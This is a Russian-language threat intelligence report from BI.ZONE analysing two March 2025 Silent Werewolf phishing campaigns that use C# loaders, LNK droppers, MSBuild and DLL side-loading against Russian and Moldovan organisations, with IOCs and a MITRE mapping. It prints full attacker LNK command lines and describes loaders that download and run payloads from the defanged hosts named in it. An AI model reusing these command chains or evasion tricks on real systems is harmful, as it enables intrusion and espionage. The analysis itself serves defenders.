ВПО или LLM? Silent Werewolf использует новые загрузчики в атаках на российские и молдавские организации
В марте эксперты BI.ZONE Threat Intelligence обнаружили две новых кампании кластера Silent Werewolf. Первая была направлена исключительно на российские организации, а вторая — на молдавские и, предположительно, российские. В обоих случаях злоумышленники использовали два варианта загрузчиков, предназначенных для получения с сервера атакующих вредоносной нагрузки. К сожалению, на момент исследования нагрузка была недоступна, но ретроспективный анализ аналогичных атак Silent Werewolf показал, что, вероятнее всего, в качестве ВПО использовалось XDigo.
Киберпреступники часто отправляют фишинговые рассылки от имени крупных и известных организаций или ссылаются на них в письмах. Чем сильнее бренд компании, тем охотнее злоумышленники используют ее айдентику. Узнаваемые логотипы и прочие элементы фирменного стиля повышают доверие со стороны пользователей, подталкивая их открыть письмо. Важно помнить, что обладатель торговой марки не несет ответственности за действия преступников и причиненный в результате ущерб.
- Фишинговые электронные рассылки остаются предпочтительным методом, который используют злоумышленники для целевых атак, особенно тех, что связаны со шпионажем.
- Атакующие ограничивают возможность получения вредоносной нагрузки, чтобы затруднить исследование атаки.
- Широкое применение легитимных средств и обфускации вредоносного кода позволяет атакующим оставаться незамеченными продолжительное время и достигать цели кибератаки.
Атакуемые страны: Россия
Атакуемые отрасли: энергетика (атомная промышленность), приборостроение, авиастроение, машиностроение
Начало кампании: 11.03.2025
В рамках данной кампании атакующие рассылали ранее неизвестный обфусцированный загрузчик, написанный на C#, который был замаскирован под досудебную претензию, адресованную председателю президиума Алматинской городской коллегии адвокатов, и под проект строительства жилого помещения.
Для доставки вредоносных файлов злоумышленники использовали фишинговые письма, в которых содержалась ссылка на загрузку ZIP-архива. В ZIP-архиве находилось два файла: LNK и еще один ZIP-архив с легитимным EXE-файлом, вредоносной библиотекой (DLL) и отвлекающим PDF-документом.
Удалось обнаружить архивы со следующими именами: proyekt.zip и dokazatelstva.zip (рис. 1 и 2).
Обнаруженные ZIP-архивы содержат:
- LNK-файл для распаковки еще одного ZIP-архива и запуска следующей стадии.
- ZIP-архив, замаскированный под конфигурационный файл с расширением
.ini. Он содержит:- отвлекающий PDF-документ;
- легитимный исполняемый файл
DeviceMetadataWizard.exeверсии10.0.17763.132, подписанный Microsoft Corporation; - DLL-библиотеку — экземпляр вредоносного .NET-загрузчика.
LNK-файл предназначен для поиска загруженного ZIP-архива в каталоге пользователя %USERPROFILE%. А также для компиляции встроенного в LNK-файл кода JScript.NET с целью распаковать в специальный каталог содержимое еще одного ZIP-архива внутри исходного и запустить извлеченный легитимный исполняемый файл, который, в свою очередь, подгружает вредоносную библиотеку — С#-загрузчик.
Пример команды из LNK-файла доказательства_0007093.lnk:
cmd.exe /c "set PATH=%windir%\system32;%PATH% & (for /R "%USERPROFILE%" %f in (dokazatelstva.zip) do @IF EXIST %f (chcp 65001 | echo | set /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a & for /f %j in ('dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe"') do @set "_jsc=%j" & for /L %i in (1,1,3) do @if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit) else (@if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") else (@if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")))) ))"
Данная команда выполняет следующие действия:
cmd.exe /c «set PATH=%windir%\system32;%PATH%— добавление пути к системному каталогуsystem32в переменную окружения PATH для обеспечения доступа к системным программам.for /R „%USERPROFILE%“ %f in (dokazatelstva.zip) do @IF EXIST %f (...)— рекурсивный поиск ZIP-архиваdokazatelstva.zipв каталоге пользователя%USERPROFILE%. Если он найден, выполняется блок@IF EXIST.- В блоке
IF EXIST:chcp 65001— установка языковой кодировки UTF-8.echo | set /p="<JScript.NET-код>" >%TEMP%\UKSS1G4Q7H6S.a— создание файла, содержащего JScript.NET-код.for /f %j in (’dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe&"’) do @set «_jsc=%j"— поиск компилятора EXE (JScript.NET Compiler).for /L %i in (1,1,3) do— выполнение цикла три раза. Действия в цикле:@if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit)— проверка существования легитимного исполняемого файла. Если он существует, происходит его запуск, иначе — выполняется проверка следующего условия.@if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7")— проверка существования файлаunzip.exe. Если он существует, происходит его запуск с параметрами%f(путь кdokazatelstva.zip) и"%USERPROFILE%\J8ZUARAW71W7, иначе — выполняется проверка следующего условия.@if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a"))— проверка отсутствия файловunzip.exe_иunzip.exe. Если они отсутствуют, происходит компиляция файла%TEMP%\UKSS1G4Q7H6S.aв%TEMP%\unzip.exeс помощью компилятораjsc.exe. Запуск процесса компиляции происходит черезforfiles.exe.
Файл unzip.exe предназначен для распаковки содержимого изначального ZIP-архива в специальный каталог, распаковки содержащегося в нем другого ZIP-архива, а также переименования себя в unzip.exe_ (рис. 3).
unzip.exe
C#-загрузчик реализован в виде динамически подключаемой библиотеки d3d9.dll, которая запускается с помощью легитимного исполняемого файла H5GDXM70NJ.exe (DeviceMetadataWizard.exe), используя технику DLL Side-Loading. Загрузчик предназначен для скачивания вредоносной нагрузки с сервера атакующих, закрепления ее на хосте в автозагрузке системы, а также открытия отвлекающего PDF-документа.
Код C#-загрузчика обфусцирован, а строки закодированы Base64 и зашифрованы XOR с ключом в виде строки UTF-8 (рис. 4). XOR-ключ для каждого экземпляра загрузчика уникальный.
Функциональные возможности C#-загрузчика:
- Проверяет аргументы запуска загрузчика.
- При запуске загрузчика с аргументом
/startupпроисходит запуск загруженной вредоносной нагрузки%APPDATA%\74EJ6RTFKKRS\yfutozlv.exe. - При запуске загрузчика без аргументов происходит копирование отвлекающего документа
test.cfgв%USERPROFILE%\Documents\dokazatelstva.pdfи его открытие с помощью командыexplorer %USERPROFILE%\Documents\dokazatelstva.pdf. - Создает асинхронную задачу для загрузки файла вредоносной нагрузки по заданному URL-адресу в конфигурационных данных загрузчика (пример:
hxxps://pdf-bazaar[.]com/files2025/?pti=npu&yay=3oKPkD33tx5Tuzz). При обращении к серверу используется следующая строка заголовка User-Agent:«Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36». Ответ от сервера декодируется Base64, расшифровывается тем же XOR-ключом, что и зашифрованные строки, затем расшифрованное содержимое снова декодируется Base64, после чего создает рабочий каталог%APPDATA%\74EJ6RTFKKRSи полученная нагрузка записывается в файл%APPDATA%\74EJ6RTFKKRS\yfutozlv.exe. - В той же асинхронной задаче вызывает в отдельном потоке функцию, которая копирует
H5GDXM70NJ.exeиd3d9.dllв каталог%APPDATA%\74EJ6RTFKKRS, затем для закрепления в системе создает Batch-скриптstartapp.batв каталоге автозагрузки, запускающий%APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exeс аргументом/startup. - В той же асинхронной задаче вызывает в отдельном потоке функцию, которая запускает загруженную вредоносную нагрузку
%APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.
Предположительно, на стороне атакующих производится проверка целевой системы. Если целевой хост не удовлетворяет требованиям, происходит загрузка LLM-модели Llama 2 в формате GGUF по ссылке hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf (рис. 5). Такой подход затрудняет исследование всей атаки, в том числе позволяет атакующим обходить средства защиты, например песочницы.
llama-2-70b.Q5_K_M.gguf вместо файла вредоносной нагрузки с сервера атакующих
Примеры отвлекающих документов показаны на рис. 6 и 7.
test.cfg (dokazatelstva.pdf)
test.cfg (proyekt.pdf)
Атакуемые страны: Молдова, Россия (предположительно)
Атакуемые отрасли: нет данных
Начало кампании: 18.03.2025
Новый вариант C#-загрузчика распространялся под видом графика обмена служебных отпусков, рекомендаций по защите информационной инфраструктуры компании от компьютерных атак с использованием программ-вымогателей. Цели атак — организации на территории России и Молдовы.
Как и в предыдущей кампании, вредоносная рассылка, предположительно, осуществлялась посредством фишинговых писем, содержащих ссылку для загрузки архива.
Специалистами были обнаружены архивы с именами Grafik_SL_0525.zip, Rekomendatsii_032025.pdf.zip.
Обнаруженные ZIP-архивы содержат следующие файлы:
Grafik_SLlnk / Rekomendatsii_032025.pdf.lnk— вредоносный LNK-файл, содержащий команду для распаковки архива и запуска следующей стадии.config.bin— файл, содержащий команды оболочки командной строки, проект сборки задачи в MSBuild и ее исходный C#-код, а также зашифрованную и закодированную полезную нагрузку, которая состоит из четырех файлов: отвлекающего PDF-файла, легитимного файлаMicrosoft.Build.Framework.dll, легитимного файлаMicrosoft.Build.Utilities.Core.dllи вредоносного C#-загрузчика в виде DLL.aini.dat— файл, содержащий случайные данные, не используется вредоносной программой.
LNK-файл вызывает утилиту forfiles.exe, с помощью которой ищет рекурсивно в каталоге профиля пользователя %USERPROFILE% ZIP-архив по маске *[название_архива] (пример: *Grafik_SL_0525.zip). Для каждого обнаруженного архива происходит распаковка его содержимого в каталог %TEMP% с помощью PowerShell. Затем — чтение содержимого файла config.bin и построчное выполнение команд в cmd.exe в тихом режиме (флаг /q).
Обфусцированная команда LNK-файла:
forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "po0x77e0x720x73he0x6cl -c Expand-Archive -F @path %TEMP%|out-null;type ($env:TMP + '\config.bin') |c0x6d0x64.e0x780x65 /q|out-null"
Деобфусцированная команда LNK-файла:
forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "powershell.exe -c Expand-Archive -F '[путь к архиву Grafik_SL_0525.zip]' %TEMP%|out-null;type ($env:TMP + '\config.bin') |cmd.exe /q|out-null"
В config.bin содержатся следующие Batch-команды (рис. 8), которые будут выполняться построчно:
mkdir %USERPROFILE%\Searches\winrt-{[GUID]}\copy /Y %TEMP%\config.bin %USERPROFILE%\Searches\winrt-{[GUID]}\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe %USERPROFILE%\Searches\winrt-{[GUID]}\config.bin >nul 2>&1exit
Пример создаваемого каталога: %USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}.
В результате выполнения указанных команд создается рабочий каталог %USERPROFILE%\Searches\winrt-{[GUID]}, куда копируется файл config.bin, после чего вызывается MSBuild для компиляции и выполнения задачи Build.
Компиляция и запуск задачи в MSBuild:
exe C:\Users\[USERNAME]\Searches\winrt-{[GUID]}\config.binexe" /noconfig /fullpaths @"%Temp%\[TEMP_DIRNAME]\[TEMP_FILENAME].cmdline"exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%Temp%\[TEMP_FILENAME].tmp" "%Temp%\[TEMP_DIRNAME]\[TEMP_FILENAME].TMP"
config.bin
Build вызывает две задачи: TaskCreator и задачу с именем [A-Za-z0-9]{10,14} (пример: B0xy2l4pee34×9).
Задача TaskCreator предназначена для чтения зашифрованных и закодированных файлов из config.bin, расшифровки, декодирования и создания данных файлов, а также запуска отвлекающего PDF-документа (%TEMP%\(Grafik_SL_0525.pdf|Rekomendatsii_032025.pdf)). Содержащиеся файлы в config.bin зашифрованы алгоритмом сдвига на 3 и закодированы Base64 (рис. 9). Код задачи TaskCreator выполняет роль дроппера.
config.bin
Расшифрованные и декодированные файлы:
Grafik_SLpdf / Rekomendatsii_032025.pdf— отвлекающий PDF-документ.[TASK_NAME].tmp— вредоносная библиотека (DLL), представляющая собой C#-загрузчик. Название DLL-файла указано вconfig.bin, и во всех случаях оно различается, например:B0xy2l4pee34×9.tmp.Microsoft.Build.Framework.dll— легитимный файл.Microsoft.Build.Utilities.Core.dll— легитимный файл.
Запуск C#-загрузчика происходит со следующими параметрами, закодированными в Base64 (рис. 10):
- Путь к рабочему каталогу.
- XOR-ключ для расшифровки вредоносной нагрузки.
- URL-адрес для загрузки вредоносной нагрузки.
- Строка заголовка User-Agent.
- Название для загруженного файла.
- Параметр для проверки условия внутри программы.
B0xy2l4pee34x9 в config.bin
Например, в одном из запусков загрузчика используются следующие декодированные параметры: "%USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\", "BSX4neaFa5zahRcCcSxGudPU8GprbySA", "hxxps://myupload[.]net/pismo/Grafik_SL_0525/?xwre=VbU5NQSLczxyvEDVzIDZR6Z3Hwp48u1m", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36", "MemoryDataProcess.exe", "ea".
Задача со случайным именем (B0xy2l4pee34×9) запускает C#-загрузчик в виде DLL. Код загрузчика обфусцирован Obfuscar. Перед выполнением основного кода загрузчик проверяет условия запуска: наличие подстроки (6-й параметр) в декодированном XOR-ключе (2-й параметр) по определенному смещению, имя пользователя не "JohnDoe", название компьютера не "HAL9TH" и значение переменной NUMBER_OF_PROCESSORS не null. Если условия запуска не соблюдены, тогда загрузчик завершает свою работу (рис. 11).
Загрузчик декодирует переданные в качестве параметров закодированные Base64 строки. Создает и удаляет от 100 до 200 случайных файлов в рабочем каталоге %USERPROFILE%\Searches\winrt-{[GUID]}\[RANDOM_NAME]. Далее загружает зашифрованную алгоритмом XOR вредоносную нагрузку по URL-адресу (hxxps[://]myupload[.]net/pismo/Grafik_SL_0525/?xwre=BrNCqgeaXXo94U18qUGqii5PpjGTk2va) и сохраняет ее в рабочий каталог (%USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\MemoryDataProcess.exe), после чего расшифровывает и запускает. Вредоносная нагрузка представляет собой исполняемый файл формата PE.
Примеры отвлекающих документов показаны на рис. 12 и 13.
Grafik_SL_0525.pdf
Rekomendatsii_032025.pdf
ZIP
e14fdb6c0b5b64e1ca318b7ad3ac9a4fd6dec60ef03089b87199306eba6e0ca659b907430dde62fc7a0d1c33c38081b7dcf43777815d1abcf07e0c77f76f5894
LNK
9c1acde0627da8b518b0522d6fed15cecf35b20ed8920628e9f580cfc3f450ed0b705938e0063e73e03645e0c7a00f7c8d8533f1912eab5bf9ad7bc44d2cf9c3cfd0d56ca3d6c9ca232252570522c4b904be2807c461276979b1f8c551ccd4aa536cd589cd685806b4348b9efa06843a90decae9f4135d1b11d8e74c7911f37d
Загрузчик
95060ba948948eea9bfc801731960b97d3efceb300622630afcbccfe12c21ccd5e34d754b0a938de7e512614f8fc6d7cd6c704f76b05044e07c97bd44bd5d591448245612a5388074e32251a0b44769170c586cc4c2ae06cd953c7a461ce34a6f3f2c3c5836ce6e3cb92aa6dfc0f133e15a7fd169a3d1049b7d82e49d1577273
Домены
file-bazar[.]compdf-bazaar[.]compdfdepozit[.]comvashazagruzka365[.]com
ZIP
3b283c67f597b926784d9cc07b6a4020f422dcbc1b669c67d993606e663dc5ea23e1cde0493f7444508d56fabd6883f476b790b262040a90ae00beb31b85279c56f62aa193a254ea2607bb1f42971ebbe4e69631d0afb1f80beb6a89b83046caaf30d6c9431def22b93c52e7d7ba57a4290bbe6c94c7f822f0a5423c50671211
LNK
6c8916e453c0fdcd9d4e1164d1f30c38ebe65aa6d26a0fb3f5586ed3fd33d1e978a4e323910a0353d10fa19f8b003697d9d675ee9f15089d54dcfd8b7a9815c2b923c1ee29c8fc5f96aae5128b6a4d414dd755ec0e11dbf636f7b92ba1e3d13e0d1b0d35dbf72bd6518d663eb0d66a91683e94435d3659d310e202e8c169d73a
Дроппер (config.bin)
3d49a2ca08b48838fde89d3f349e08de3b58f3f9ddcdd07c8dff7559b5f01cba47b2b73e87bf21a076c7bfba34d5eee5a136d3d43d19679d14f705db034a97d7c10d77e36dba3b410480359812c771c2185b0c586bd5e23a6d2454aba45208f2ea89ca6c00aea17ea97374e08c93e57fe2cf73a6ea36024cd659d757b51bda41
aini.dat (файл со случайными данными, не используется)
aini.dat 9cb6e6b8b81e97645760cc6d05298c7079565a5c6c9de3fb760e771bb699e583aini.dat b4f57e04bc7d0df696ece85ff6f9b306a4e2925c6fdb1e68c80726a974534ff3
Загрузчик
73d35df23a6cce8c8b941730dec16b1f10945725ba696c7db784a5e4b65d4aa30d730d64432a80f950c0685f451606fde5dc27f7a58dcfe978c4cd784a08b0efd8bf46a9919806112200cb52f6c235726d1b8102de1231ae4a956b7d292063bac8268c6d2aa536937366f242abdfdae0b5432d6abc2680c4577ac2a252010182
Домены
myupload[.]netnews365[.]tech
| Тактика | Техника | Процедура |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Link |
Silent Werewolf использует ссылки в фишинговых электронных письмах для загрузки ВПО |
| Execution |
Command and Scripting Interpreter: PowerShell |
Silent Werewolf использует вредоносный LNK-файл для запуска команды |
|
Command and Scripting Interpreter: Windows Command Shell |
Silent Werewolf использует вредоносный LNK-файл для выполнения команды |
|
|
User Execution: Malicious Link |
Silent Werewolf предпринимает попытки убедить пользователя перейти по ссылке и загрузить ZIP-архив, содержащий вредоносные файлы |
|
|
User Execution: Malicious File |
Жертва должна запустить вредоносный LNK-файл, чтобы инициировать процесс компрометации системы |
|
| Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Silent Werewolf использует C#-загрузчик, создающий Batch-скрипт |
| Defense Evasion |
Deobfuscate/Decode Files or Information |
Silent Werewolf использует задачу TaskCreator из файла Silent Werewolf использует C#-загрузчик, в котором строки декодируются Base64 и расшифровываются алгоритмом XOR |
|
Hijack Execution Flow: DLL |
Silent Werewolf использует технику DLL Side-Loading для запуска вредоносной DLL C#-загрузчика с помощью легитимного исполняемого файла |
|
|
Indicator Removal: File Deletion |
Silent Werewolf использует C#-загрузчик, который создает и удаляет от 100 до 200 случайных файлов в рабочем каталоге вредоносной программы |
|
|
Indirect Command Execution |
Silent Werewolf использует |
|
|
Masquerading: Rename Legitimate Utilities |
Silent Werewolf маскирует C#-загрузчик под библиотеку DirectX 9.0 — |
|
|
Masquerading: Double File Extension |
Silent Werewolf использует в названии LNK-файла двойное расширение |
|
|
Obfuscated Files or Information: Compile After Delivery |
Silent Werewolf использует компилятор |
|
|
Obfuscated Files or Information |
Silent Werewolf использует обфускатор Obfuscar для обфускации C#-загрузчика Silent Werewolf использует Base64 и XOR для шифрования строк в C#-загрузчике |
|
|
Obfuscated Files or Information: Embedded Payloads |
Silent Werewolf использует файл |
|
|
Obfuscated Files or Information: Command Obfuscation |
Silent Werewolf использует во вредоносных LNK-файлах обфусцированные команды |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
Silent Werewolf использует Base64 и XOR (или просто XOR) для декодирования и расшифровки исполняемого файла конечной полезной нагрузки, загружаемой с сервера |
|
|
Trusted Developer Utilities Proxy Execution: MSBuild |
Silent Werewolf использует |
|
|
Virtualization / Sandbox Evasion: System Checks |
Silent Werewolf использует в C#-загрузчике проверку имени пользователя, названия компьютера, количества процессоров |
|
| Command and Control |
Application Layer Protocol: Web Protocols |
Silent Werewolf использует протокол HTTPS для загрузки зашифрованного файла полезной нагрузки с сервера |
|
Ingress Tool Transfer |
Silent Werewolf использует C#-загрузчики собственной разработки для скачивания вредоносной полезной нагрузки с сервера |
Фишинговые рассылки — популярный вектор атаки на организации. Для защиты почты можно применять специализированные сервисы, помогающие фильтровать нежелательные письма. Одно из таких решений — BI.ZONE Mail Security. Оно инспектирует каждое электронное сообщение, чтобы избавиться от нелегитимных. Для этого используется более 600 механизмов фильтрации, реализованных на основе машинного обучения, статистического, сигнатурного и эвристического анализа. При этом безопасные письма доставляются вовремя.
Чтобы защититься от атак кластера Silent Werewolf и подобных им, важно не только обнаружить попытку проникновения в сеть, но и вовремя нейтрализовать угрозу. Поэтому мы рекомендуем внедрять решения для защиты конечных точек от сложных угроз, например BI.ZONE EDR. Такой продукт поможет отследить атаку на ранней стадии, а затем оперативно отреагировать на угрозу в автоматическом режиме или с помощью команды кибербезопасности.
